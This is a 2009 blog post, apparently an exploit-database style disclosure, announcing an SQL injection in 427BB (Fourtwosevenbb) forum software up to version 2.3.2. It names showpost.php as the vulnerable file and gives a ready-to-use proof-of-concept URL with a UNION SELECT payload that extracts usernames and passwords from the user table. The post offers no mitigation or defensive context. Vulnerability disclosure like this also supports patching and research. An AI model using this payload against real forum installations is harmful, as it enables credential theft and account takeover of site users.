r00t cr4wl3r: 427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit

Sabtu, 05 Desember 2009

427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Download Script      :  http://sourceforge.net/projects/fourtwosevenbb/files/
########################################################################

########################################################################
#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php
#
#      
########################################################################

########################################################################
#PoC  :   http://server/[path]/showpost.php?ForumID=1&post=[SQL]
#         http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--
########################################################################

 [ Gorontalo / 2009 ]

r00t cr4wl3r

Sabtu, 05 Desember 2009

427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit

0 komentar:

Soundtrack

r00t